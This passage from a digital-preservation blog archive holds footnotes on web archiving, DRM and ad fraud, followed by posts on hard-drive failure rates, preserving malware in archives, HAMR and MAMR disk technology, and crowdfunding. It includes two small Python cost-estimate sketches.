page</td></tr><tr><td>errdoc.gabia.net/403.html</td><td>16,414</td><td>Error page</td></tr><tr><td>daum.net</td><td>14,305</td><td>Search engine</td></tr><tr><td>img.kbs.co.kr/pageerror</td><td>13,042</td><td>Error page</td></tr><tr><td>hani.co.kr/oops.html</td><td>12,676</td><td>Error page</td></tr><tr><td>chosun.com</td><td>9,839</td><td>Newspaper</td></tr><tr><td>donga.com</td><td>9,587</td><td>News</td></tr><tr><td>hankooki.com</td><td>7,762</td><td>Search engine</td></tr></tbody></table>5 of the top 10 most frequently archived Korean URIs in their sample are what are called <a href="http://blog.dshr.org/2015/02/the-evanescent-web.html">"soft 404s"</a>, pages that should return <a href="https://en.wikipedia.org/wiki/List_of_HTTP_status_codes">"404 Not Found"</a> but instead return <a href="https://en.wikipedia.org/wiki/List_of_HTTP_status_codes">"200 OK"</a>. </li><li id="Footnote21">Senators have <a href="https://www.theverge.com/2017/10/19/16502946/facebook-twitter-russia-honest-ads-act">introduced a bill</a>:<br /><blockquote>the Honest Ads Act, would require companies like Facebook and Google to keep copies of political ads and make them publicly available. 
Under the act, the companies would also be required to release information on who those ads were targeted to, as well as information on the buyer and the rates charged for the ads. </blockquote></li><li id="Footnote22">Based on <a href="https://arstechnica.com/gaming/2017/10/denuvos-drm-ins-now-being-cracked-within-hours-of-release/">reporting by Kyle Orland at <i>Ars Technica</i></a>, <a href="https://boingboing.net/2017/10/19/denuvo.html">Cory Doctorow writes</a>:<br /><blockquote>Denuvo is billed as the video game industry's "best in class" DRM, charging games publishers a premium to prevent people from playing their games without paying for them. In years gone by, Denuvo DRM would remain intact for as long as a month before cracks were widely disseminated.<br /><br />But the latest crop of Denuvo-restricted games were all publicly cracked within 24 hours.<br /><br />It's almost as though hiding secrets in code you give to your adversary was a fool's errand.</blockquote></li><li id="Footnote23">Notably, Portugal's new law on DRM contains several useful features including a broad exemption from anti-circumvention for libraries and archives, and a ban on applying DRM to public-domain or government-financed documents. For details, see the <a href="https://www.eff.org/deeplinks/2017/10/portugal-bans-use-drm-limit-access-public-domain-works">EFF's Deeplinks blog</a>.</li><li id="Footnote24">Some idea of the level of fraud in Web advertising can be gained from an <a href="http://adage.com/article/digital/business-insider-york-times-shed-details-ad-industry-s-biggest-problem/311081/">experiment by <i>Business Insider</i></a>:<br /><blockquote>a Business Insider advertiser thought they had purchased $40,000 worth of ad inventory through the open exchanges when in reality, the publication only saw $97, indicating the rest of the money went to fraud.<br /><br />"There was more people saying they were selling Business Insider inventory then we could ever possibly imagine," ... "We believe there were 10 to 30 million impressions of Business Insider, for sale, every 15 minutes."<br /><br />To put the numbers in perspective, Business Insider says it sees 10 million to 25 million impressions a day.</blockquote></li><li id="Footnote25">Last Thursday's example was New York's <a href="https://www.nytimes.com/2017/11/02/nyregion/dnainfo-gothamist-shutting-down.html"><i>Gothamist</i> and <i>DNAinfo</i> local news sites</a>:<br /><blockquote>A week ago, reporters and editors in the combined newsroom of <a href="https://www.dnainfo.com/new-york/">DNAinfo</a> and <a href="http://gothamist.com/">Gothamist</a>, two of New York City’s leading digital purveyors of local news, celebrated victory in their <a href="https://www.nytimes.com/2017/10/27/nyregion/dnainfo-gothamist-union.html">vote to join a union</a>.<br /><br />On Thursday, they lost their jobs, as Joe Ricketts, the billionaire founder of TD Ameritrade who owned the sites, shut them down.</blockquote><a href="https://www.huffingtonpost.com/entry/dnainfo-gothamist-shut-down_us_59fb891be4b0b0c7fa39122e">Twitter was unhappy</a>:<br /><blockquote>The unannounced closure prompted wide backlash from other members of the media on Twitter, with many pointing out that neither writers whose work was published on the sites nor readers can access their articles any longer. </blockquote>The Internet Archive has <a href="https://web.archive.org/web/*/http://gothamist.com/">collected Gothamist since 2003</a>; it has many but not all of the articles. 
By Saturday, <a href="https://www.nytimes.com/2017/11/03/opinion/dnainfo-gothamist-ricketts-union.html?_r=0">Joe Ricketts thought better of the takedown</a>; the sites were back up. But for how long? See also <a href="http://www.clickhole.com/article/we-employees-clickholecom-have-voted-unanimously-d-6952">here</a>.</li></ol><h3>Acknowledgements</h3>I'm grateful to Herbert van de Sompel and Michael Nelson for constructive comments on drafts, and to Cliff Lynch, Michael Buckland and the participants in <a href="https://www.ischool.berkeley.edu/events/ias">UC Berkeley's Information Access Seminar</a>, who provided useful feedback on a rehearsal of this talk. That isn't to say they agree with it.<br /><br />David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com1tag:blogger.com,1999:blog-4503292949532760618.post-42025870903495862082017-11-01T08:00:00.000-07:002017-11-01T08:00:10.535-07:00Randall Munroe Says It All<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://imgs.xkcd.com/comics/digital_resource_lifespan.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="497" data-original-width="697" height="142" src="https://imgs.xkcd.com/comics/digital_resource_lifespan.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">The <a href="https://xkcd.com/1909/">latest XKCD</a> is a succinct summation of the situation, especially the mouse-over.</td></tr></tbody></table>David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com1tag:blogger.com,1999:blog-4503292949532760618.post-87391092812843561052017-10-31T08:00:00.004-07:002017-10-31T08:00:03.644-07:00Storage Failures In The FieldIt's past time for another look at the invaluable <a href="https://www.backblaze.com/blog/hard-drive-failure-rates-q3-2017/">hard drive data that Backblaze puts out quarterly</a>. As Peter Bright notes at <i>Ars Technica</i>, despite being based on limited data, the current stats <a href="https://arstechnica.com/gadgets/2017/10/big-hard-disks-may-be-breaking-the-bathtub-curve/">reveal two interesting observations</a>: <br /><ul><li>Backblaze is seeing reduced rates of infant mortality for the 10TB and 12TB drive generations:<br /><blockquote>The initial data from the 10TB and 12TB disks, however, has not shown that pattern. While the data so far is very limited, with 1,240 disks and 14,220 aggregate drive days accumulated so far, none of these disks (both Seagate models) have failed.</blockquote></li><li>Backblaze is seeing no reliability advantage from enterprise as against consumer drives:<br /><blockquote>the company has now accumulated 3.7 million drive days for the consumer disks and 1.4 million for the enterprise ones. Over this usage, the annualized failure rates are 1.1 percent for the consumer disks and 1.2 percent for the enterprise ones. </blockquote></li></ul>Below the fold, some commentary.<br /><br /><a name='more'></a>The first thing to note is that devoting engineering effort to reducing infant mortality can have a significant return on investment. A drive that fails early will be returned under warranty, costing the company money. A drive that fails after the warranty expires cannot be returned. Warranty costs must be reserved against in the company's accounts. 
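To make the incentive concrete, here is a back-of-envelope sketch of the warranty reserve. Every number in it (drive cost, return handling cost, failure rates) is a hypothetical I chose to illustrate the arithmetic, not industry data:<br />
<pre>
# Back-of-envelope warranty-reserve arithmetic. All numbers are
# hypothetical; only the structure of the calculation matters.

DRIVE_COST = 250.0     # $ per replacement drive (assumed)
HANDLING_COST = 50.0   # $ per return: shipping, testing, restocking (assumed)
WARRANTY_YEARS = 5

def reserve_per_drive(infant_afr, mature_afr, infant_years=2):
    """Expected warranty cost per drive: the probability of failing in
    each warranty year times the cost of honoring the claim."""
    reserve = 0.0
    survival = 1.0
    for year in range(WARRANTY_YEARS):
        afr = mature_afr if year >= infant_years else infant_afr
        reserve += survival * afr * (DRIVE_COST + HANDLING_COST)
        survival *= 1.0 - afr
    return reserve

# Compare a 3% infant-mortality AFR with engineering it down to 1%.
before = reserve_per_drive(infant_afr=0.03, mature_afr=0.01)
after = reserve_per_drive(infant_afr=0.01, mature_afr=0.01)
print(f"reserve per drive: ${before:.2f} vs ${after:.2f}")
print(f"saving per million drives: ${(before - after) * 1e6:,.0f}")
</pre>
With these made-up numbers the saving is around $11 per drive; at the volumes in which drives ship, that adds up fast.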
Any reduction in the rate of early failures goes straight to the company's bottom line.<br /><br />Thus engineering devoted to reducing infant mortality is much more profitable than engineering devoted to extending the drives' service life. Extending service life beyond the current five years is wasted effort, because unless Kryder's law slows even further, the drives will be replaced to get <a href="http://blog.dshr.org/2013/07/immortal-media.html">more capacity in the same slot</a>. Backblaze is <a href="https://www.backblaze.com/blog/hard-drive-benchmark-stats-2016/">replacing drives for this reason</a>:<br /><blockquote class="tr_bq">You’ll also notice that we have used a total of 85,467 hard drives. But at the end of 2016 we had 71,939 hard drives. Are we missing 13,528 hard drives? Not really. While some drives failed, the remaining drives were removed from service due primarily to migrations from smaller to larger drives.</blockquote>The first observation makes it look as though the disk manufacturers have been following this strategy. This also explains the second observation. The goal is zero infant failures for both enterprise and consumer drives. To the extent that this goal is met, failure rates for both types in the first two years would be the same, zero. It might be that after the first two years, when the consumer drives were out of warranty, they would start to fail whereas the enterprise drives, still in warranty, would not.<br /><br />But my guess is that both drive types will continue to fail at about the same rate because they share so much underlying technology. Backblaze has a long history of using consumer drives, and their stats show some models are reliable over 4-5 years, others not. A significant part of the enterprise drives' higher price is the cost of the five-year warranty. <br /><br /><span class="fullpost"> </span>David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com0tag:blogger.com,1999:blog-4503292949532760618.post-61041068210634030302017-10-19T08:00:00.004-07:002017-10-19T08:00:25.044-07:00Preserving MalwareJonathan Farbowitz's NYU MA thesis <a href="https://www.nyu.edu/tisch/preservation/program/student_work/2016spring/16s_thesis_farbowitz_final.pdf"><i>More Than Digital Dirt: Preserving Malware in Archives, Museums, and Libraries</i></a> is well worth a more leisurely reading than I've given it so far. He expands greatly on the argument I've made that preserving malware is important, and that <a href="http://blog.dshr.org/2016/09/scary-monsters-under-bed.html">attempting to ensure archives are malware-free is harmful</a>:<br /><blockquote>At ingest time, the archive doesn't know what it is about the content future scholars will be interested in. In particular, they don't know that the scholars aren't studying the history of malware. By modifying the content during ingest they may be destroying its usefulness to future scholars. </blockquote>For example, Farbowitz introduces his third chapter <i>A Series of Inaccurate Analogies</i> thus:<br /><blockquote>In my research, I encountered several criticisms of both the intentional collection of malware by cultural heritage institutions and the preservation of malware-infected versions of digital artefacts. These critics have attempted to draw analogies between malware infection and issues that are already well-understood in the treatment and care of archival collections. 
I will examine each of these analogies to help clarify the debate and elucidate how malware fits within the collecting mandate of archives, museums, and libraries</blockquote>He goes on to demolish the ideas that malware is like dirt or mold. He provides several interesting real-world examples of archival workflows encountering malware. His eighth chapter <i>Risk Assessment Considerations for Storage and Access</i> is especially valuable in addressing the reasons why malware preservation is so controversial.<br /><br />Overall, a very valuable contribution.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com0tag:blogger.com,1999:blog-4503292949532760618.post-88158832947495846452017-10-17T08:00:00.007-07:002017-10-17T08:00:10.989-07:00Will HAMR Happen?For more than five years I've been skeptical of the <a href="http://blog.dshr.org/2012/05/catching-up.html">storage industry's optimistic roadmaps</a> in general, and of the idea that HAMR (Heat Assisted Magnetic Recording) will replace the current PMR (Perpendicular Magnetic Recording) as the technology for hard disks any time soon. The first ship date for HAMR drives has been <a href="http://blog.dshr.org/2016/12/the-medium-term-prospects-for-long-term.html">slipping in real time for nearly a decade</a>, and last year <a href="http://blog.dshr.org/2017/08/approaching-physical-limits.html">Seagate slipped it again</a>: <br /><blockquote>[Seagate] is targeting 2018 for HAMR drive deliveries, with a 16TB 3.5-inch drive planned, featuring 8 platters and 16 heads. </blockquote>Now, Chris Mellor at <i>The Register</i> <a href="https://www.theregister.co.uk/2017/10/12/wdc_mamr_tech/">reports that</a>: <br /><blockquote>WDC has given up on heat-assisted magnetic recording (HAMR) and is developing a microwave-assisted technique (MAMR) to push disk drive capacity up to 100TB by the 2030s.<br /><br />It's able to do this with relatively incremental advances, avoiding the technological development barrier represented by <a href="https://www.theregister.co.uk/2016/05/12/how_will_hamr_technology_affect_seagate_in_derry/">HAMR</a>. These developments include multi-stage head actuation and so-called Damascene head construction.</blockquote>Below the fold, I assess this news.<br /><a name='more'></a><br />Although HAMR was <a href="https://www.theregister.co.uk/2012/03/20/seagate_terabit_areal_density/">demonstrated in the lab back in 2012</a>, making it <a href="https://www.theregister.co.uk/2012/03/20/seagate_terabit_areal_density/">work in production volumes is difficult</a>:<br /><blockquote>But adding the laser-heating source to the read/write head adds cost and difficulty, and ensuring its reliability, longevity and also that of the recording medium as it gets intensely heated and cooled repeatedly is also a challenge.</blockquote>A year and a half ago <a href="http://blog.dshr.org/2016/05/the-future-of-storage.html">I wrote</a>: <br /><blockquote class="tr_bq">The disk vendors cannot raise prices significantly, doing so would accelerate the reduction in unit volume. Thus their income will decrease, and thus their ability to finance the investments needed to get HAMR and then BPM into the market. The longer they delay these investments, the more difficult it becomes to afford them. Thus it is possible that HAMR and likely that BPM will be "stranded technologies", advances we know how to build, but never actually deploy in volume.</blockquote>It is starting to look like I was right. 
WDC's <a href="https://www.theregister.co.uk/2017/10/12/wdc_mamr_tech/">MAMR technology</a> is different, and might be easier:<br /><blockquote>It adds microwaves to the write head, using a spin-torque oscillator (STO) to generate them. Electrons in a magnetised area have a spin state, tending to spin one way or another. By applying microwaves at the right frequency a resonance effect can alter the spin state and make it easier for the write head's electrical field to alter the magnetic polarity of the domain.</blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-OVEIu1ZfC2E/WeEBkFF8ozI/AAAAAAAAD9w/eKcUzWIE4DYfdsWtjQdqT_ab26yHXxb-QCLcBGAs/s1600/wdc_mamr_hdd_vs_ssds.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="371" data-original-width="650" height="113" src="https://1.bp.blogspot.com/-OVEIu1ZfC2E/WeEBkFF8ozI/AAAAAAAAD9w/eKcUzWIE4DYfdsWtjQdqT_ab26yHXxb-QCLcBGAs/s200/wdc_mamr_hdd_vs_ssds.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://regmedia.co.uk/2017/10/12/wdc_mamr_hdd_vs_ssds.jpg">Source</a></td></tr></tbody></table>Perhaps the most interesting <a href="https://www.theregister.co.uk/2017/10/12/wdc_mamr_tech/">part of the report is that WDC</a>:<br /><blockquote>thinks it can reach a 4Tbit/in<sup>2</sup> areal density over time using MAMR technology, with a 15 per cent compound annual growth rate (CAGR) in capacity.</blockquote>I've been writing about the slowing of Kryder's Law from 30-40%/yr to 10-20%/yr since at least 2014, and that <a href="http://blog.dshr.org/2017/07/patting-myself-on-back.html">projection has been verified</a>. Remembering that industry projections have a history of optimism, WDC's projection of a 15% Kryder rate going forward on the assumption that they can get a new recording technology into the market in 2020 should be treated skeptically. I would expect that the future Kryder rate will be more like 10% than 15%. 
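The gap between those rates compounds dramatically. Here is a minimal sketch of what they imply for cost per terabyte over a decade (the starting price is an arbitrary assumption; only the ratios between the outcomes matter):<br />
<pre>
# Compound effect of different Kryder rates on $/TB.
# The starting price is arbitrary; only the relative decline matters.

START_PER_TB = 25.0  # $/TB today (assumed)

def cost_per_tb(kryder_rate, years):
    """kryder_rate is the annual fractional fall in $/TB."""
    return START_PER_TB * (1.0 - kryder_rate) ** years

for rate in (0.10, 0.15, 0.30):
    print(f"{rate:.0%}/yr: ${cost_per_tb(rate, 10):.2f}/TB after 10 years")
</pre>
At 10%/yr the cost per terabyte a decade out is nearly double what 15%/yr would deliver, and an order of magnitude above what the historic 30-40%/yr rates would have produced.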
I would also expect that the cost factor between disk and flash in the 2020s would be less than 10x rather than greater than 10x, but still more than enough to maintain hard disk's dominance of the bulk storage market.<br /><br />David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com2tag:blogger.com,1999:blog-4503292949532760618.post-20842477874978560162017-10-12T08:00:00.002-07:002017-10-12T08:00:21.120-07:00Crowdfunding<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-jhLHa4FNR8g/Wd0v4eZkD_I/AAAAAAAAD8A/Md7xEyyyl0cFg6bLhJC5tIpputLi5gGagCLcBGAs/s1600/Exolife.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="383" data-original-width="680" height="112" src="https://4.bp.blogspot.com/-jhLHa4FNR8g/Wd0v4eZkD_I/AAAAAAAAD8A/Md7xEyyyl0cFg6bLhJC5tIpputLi5gGagCLcBGAs/s200/Exolife.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.kickstarter.com/projects/exocube/exolife-finder-a-new-telescope-to-find-life-on-exo">ExoLife Finder</a></td></tr></tbody></table>I've been a fairly enthusiastic crowdfunder for the past 5 years; I started with the Raspberry Pi. Most recently I backed the <a href="https://www.kickstarter.com/projects/exocube/exolife-finder-a-new-telescope-to-find-life-on-exo">ExoLife Finder</a>, a huge telescope using innovative technology intended to directly image the surfaces of nearby exoplanets. Below the fold, some of my history with crowdfunding to establish my credentials before I review some recent research on the subject.<br /><br /><a name='more'></a><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-EyI7TOWnWic/Wd0s06vJNLI/AAAAAAAAD7o/5ROAoIkHSQw_exnL9gx7SZfO6ENpbMPcwCLcBGAs/s1600/Lowline.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="873" data-original-width="1552" height="112" src="https://4.bp.blogspot.com/-EyI7TOWnWic/Wd0s06vJNLI/AAAAAAAAD7o/5ROAoIkHSQw_exnL9gx7SZfO6ENpbMPcwCLcBGAs/s200/Lowline.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://thelowline.org/">The Lowline</a></td></tr></tbody></table>My <a href="https://www.kickstarter.com/">Kickstarter</a> account shows I've backed 32 funded and 5 unfunded projects. 
The funded ones include:<br /><ul><li><a href="https://www.kickstarter.com/projects/855802805/lowline-an-underground-park-on-nycs-lower-east-sid">The Lowline</a>, an on-going project to turn an abandoned street-car garage in NYC into an underground park.</li><li><a href="https://www.kickstarter.com/projects/202186174/roses-fine-food-from-scratch-diner-food-in-detroit">Rosie's Fine Food</a>, reviving a desolate part of Detroit by opening a restaurant.</li><li><a href="https://www.kickstarter.com/projects/1598272670/chip-the-worlds-first-9-computer">CHIP</a>, the world's first $9 computer.</li><li><a href="https://www.kickstarter.com/projects/608159144/the-most-mysterious-star-in-the-galaxy">The Most Mysterious Star In The Galaxy</a>, Tabetha Boyajian's project to monitor brightness changes in star KIC8462852.</li></ul><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-KQAveTBy_tE/Wd0tOTgTZ0I/AAAAAAAAD7s/onRKsZ5Ivrcxwl0VsfdMCVykr5Av30ytgCLcBGAs/s1600/Scanadu.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1000" data-original-width="1500" height="133" src="https://3.bp.blogspot.com/-KQAveTBy_tE/Wd0tOTgTZ0I/AAAAAAAAD7s/onRKsZ5Ivrcxwl0VsfdMCVykr5Av30ytgCLcBGAs/s200/Scanadu.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Scanadu Scout</td></tr></tbody></table>I've also backed 8 projects on <a href="https://www.indiegogo.com/">Indiegogo</a>, such as:<br /><ul><li><a href="https://www.indiegogo.com/projects/scanadu-scout">Scanadu Scout</a>, a pocket-size gadget that measured blood pressure, pulse, temperature and blood oxygenation. Alas, it didn't get through the FDA into production, and my now-irreplaceable unit has just expired after about four years of daily use.</li><li><a href="https://www.indiegogo.com/projects/code-debugging-the-gender-gap">CODE: Debugging the Gender Gap</a>, a wonderful movie about gender issues in technology.</li></ul><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-Kx1yvlpYgZs/Wd0uTqi_HcI/AAAAAAAAD70/FcCegJPgCywq7lAIbNB0S2oQmltMdB0rwCLcBGAs/s1600/CircuitStickers.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="630" data-original-width="787" height="160" src="https://3.bp.blogspot.com/-Kx1yvlpYgZs/Wd0uTqi_HcI/AAAAAAAAD70/FcCegJPgCywq7lAIbNB0S2oQmltMdB0rwCLcBGAs/s200/CircuitStickers.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://chibitronics.com/shop/chibitronics-starter-kit-circuit-sticker-sketchbook/">Chibitronics Circuit Stickers</a></td></tr></tbody></table>And 5 on <a href="https://www.crowdsupply.com/">Crowd Supply</a>, such as:<br /><ul><li>Jie Qi's amazing <a href="https://www.crowdsupply.com/chibitronics/circuit-stickers">Circuit Stickers</a>. </li><li><a href="https://www.crowdsupply.com/design-shift/orwl">ORWL</a>, a physically secure computer to defend against the "<a href="https://en.wikipedia.org/wiki/Rootkit#bootkit">Evil Maid attack</a>".</li></ul>In most cases, my reaction to the completed projects has ranged from OK to Wow! 
My ORWL showed up yesterday, a little later than promised. I haven't yet had time to explore its features, but it looks like a Wow! I'd guess that about 1/6 of my projects were disappointing, about half OK, and about 1/3 Wow! Which, for a venture capitalist, would be a great track record.<br /><br />Ethan Mollick's 2013 paper <a href="https://doi.org/10.1016/j.jbusvent.2013.06.005"><i>The dynamics of crowdfunding: An exploratory study</i></a> showed that:<br /><blockquote>the vast majority of founders seem to fulfill their obligations to funders, but that over 75% deliver products later than expected, with the degree of delay predicted by the level and amount of funding a project receives. </blockquote>Mollick <a href="https://doi.org/10.1016/j.jbusvent.2013.06.005">found that</a>:<br /><blockquote>The majority of products were delayed, some substantially, and may, ultimately, never be delivered. Of the 247 projects that delivered goods, the mean delay was 1.28 months (sd = 1.56). Of the 126 projects that were delayed, the mean delay to date was 2.4 months (sd = 1.97). Only 24.9% of projects delivered on time, and 33% had yet to deliver.<br />...<br />I find strong evidence that project size and the increased expectations around highly popular projects are related to delays. ... even controlling for project size, the degree to which projects are overfunded also predicts delays. Projects that are funded at 10× their goal are half as likely to deliver at a given time, compared to projects funded at their goal. ... project delays were attributed to a range of problems associated with unexpected success: manufacturing problems, the complexity of shipping, changes in scale, changes in scope, and unanticipated certification issues were all listed as primary causes of delays.</blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-emeJdQnAjsg/Wd6RdWB13_I/AAAAAAAAD88/rTJ8GBJL74UjSgYEje7p55IuJVKsAbGYwCLcBGAs/s1600/orwl.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="421" data-original-width="749" height="111" src="https://4.bp.blogspot.com/-emeJdQnAjsg/Wd6RdWB13_I/AAAAAAAAD88/rTJ8GBJL74UjSgYEje7p55IuJVKsAbGYwCLcBGAs/s200/orwl.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.crowdsupply.com/design-shift/orwl">ORWL</a></td></tr></tbody></table>ORWL was funded four times its relatively modest $25K goal, so some delay is normal. In my opinion, overfunding delays are related to Bill Joy's Law of Startups: "success is inversely proportional to the amount of money". What Bill meant was that tight funding forces teams to take decisions quickly and stick with them, ensuring that if they are going to fail they fail fast. 
Lavish funding enables analysis paralysis, and pursuit of multiple options simultaneously, both of which detract from focus.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-cppjIjKqQD4/Wd6Sx8cOseI/AAAAAAAAD9I/sqQpArBlsO4PToUG2OqXe9SCvZQriyLngCLcBGAs/s1600/nerdwax.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="873" data-original-width="1552" height="112" src="https://2.bp.blogspot.com/-cppjIjKqQD4/Wd6Sx8cOseI/AAAAAAAAD9I/sqQpArBlsO4PToUG2OqXe9SCvZQriyLngCLcBGAs/s200/nerdwax.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.kickstarter.com/projects/donhejny/nerdwax-it-keeps-your-glasses-up">Nerdwax</a></td></tr></tbody></table>The recently published research is <a href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3003283"><i>Does the Crowd Support Innovation? Innovation Claims and Success on Kickstarter</i></a> by Anirban Mukherjee <i>et al</i> with an overview <a href="https://knowledge.insead.edu/kickstarter-backers-like-novelty-or-usefulness-not-both-0">here</a>:<br /><blockquote>we arrive at the startling conclusion that novelty and usefulness are not viewed as synergistic by the crowd. While crowdfunding pledges are boosted when the project is said to be useful (or alternatively, novel), claiming that it is both reduces the total amount of pledges by 26 percent.<br /><br />Our data show that claims of novelty or usefulness, taken separately, do increase the total pledge amount. As a matter of fact, they have a very large initial effect, meaning that even one claim for usefulness (or novelty) greatly boosted the total pledged sum (as compared with projects devoid of either claim). However, it is also important to pick one or the other, not combine them. </blockquote>This conclusion is based on analyzing the text, video and images of over 50K Kickstarter projects in product-oriented categories such as Hardware and Technology using <a href="https://knowledge.insead.edu/kickstarter-backers-like-novelty-or-usefulness-not-both-0">machine-learning tools</a>:<br /><blockquote class="tr_bq">The resulting number of occurrences of the word “novel” and its synonyms served as proxy for novelty claims. Conversely, the sum of occurrences of the word “useful” and its synonyms became the measure for claimed usefulness.</blockquote>The authors <a href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3003283">ask</a>:<br /><blockquote>our findings are consistent with the literature on idea screening but not that on consumer evaluation of innovation, as modest innovations are more likely to get funded than more extreme innovations, i.e., innovations that are high on both novelty and usefulness. What is a possible reason for this inconsistency, given that backers in a crowdfunding context typically receive the product in exchange for their support, thus making their decision more like a product choice decision than a typical idea screening decision?</blockquote>The authors <a href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3003283">speculate that</a>:<br /><blockquote>this may be due to the high degree of uncertainty associated with the choice in a crowdfunding context, compared to a consumer purchase context. 
In the prototypical purchase context, consumer protection laws guarantee receipt of the purchased product. In the crowdfunding context, however, there is much greater uncertainty regarding (a) receiving the product and (b) features of the product, than in purchasing, for the following reasons. First, a project may not successfully reach its funding goal. In this case, backers are refunded but do not receive the product. Second, a successfully funded project may be delayed or may fail (the creator may be unable to follow-through). For example, a recent study ... found that more than three-quarters of successfully funded projects (on Kickstarter) are either delayed or failed. In this case, backers are neither guaranteed refunds – they may lose the entire amount pledged – nor guaranteed receipt of the product. Third, projects on Kickstarter are proposed blueprints, rather than descriptions, of the final product. ... we speculate that the higher level of uncertainty in the crowdfunding context drives backers to choose modest innovations and shy away from more extreme innovations, i.e., innovations that are high on both novelty and usefulness.</blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-IcMhhLGBYhw/Wd1I2m2nlOI/AAAAAAAAD8Q/5cjy8JPFhYwxNVaAv9EvYziNkPe4Az7rgCLcBGAs/s1600/HexBright.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="510" data-original-width="680" height="150" src="https://4.bp.blogspot.com/-IcMhhLGBYhw/Wd1I2m2nlOI/AAAAAAAAD8Q/5cjy8JPFhYwxNVaAv9EvYziNkPe4Az7rgCLcBGAs/s200/HexBright.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.kickstarter.com/projects/christian-carlberg/hexbright-an-open-source-light">HexBright</a></td></tr></tbody></table>I agree that for product-oriented projects the extra uncertainty over a purchase tends to make backers conservative. But I may be an outlier. Overall, my experience with product-oriented projects is much better than Mollick's numbers; 1 failure to deliver and 2 long delays in 21 projects. Maybe I'm better than average at assessing projects. I have sometimes favored novelty over usefulness. For example, who really <i>needs</i> an <a href="https://www.kickstarter.com/projects/christian-carlberg/hexbright-an-open-source-light">open-source Arduino-compatible flashlight</a>? 
But HexBright turned out to be a really good flashlight even ignoring the Arduino inside, which I have never found time to program.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-TCQsDIkP01I/Wd1KMRvUHFI/AAAAAAAAD8c/pF0UoHvsWLcymNgreAjVIiuYD20BU-TtwCLcBGAs/s1600/usb-condom.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="499" data-original-width="749" height="133" src="https://4.bp.blogspot.com/-TCQsDIkP01I/Wd1KMRvUHFI/AAAAAAAAD8c/pF0UoHvsWLcymNgreAjVIiuYD20BU-TtwCLcBGAs/s200/usb-condom.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.crowdsupply.com/xipiter/usbcondom">USB Condom</a></td></tr></tbody></table>On the other hand, I've sometimes favored usefulness over innovation. There's not a great deal of innovation in a <a href="https://www.crowdsupply.com/xipiter/usbcondom">USB Condom</a>, which is simply two USB connectors on a circuit board lacking the data connections. You can check this by looking at the traces. But it is very useful even for people less paranoid than I.<br /><br />It is important to note that, as far as I can see, almost all the research on crowdfunding is restricted to product-oriented projects. Products are only about 2/3 of my backings.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td 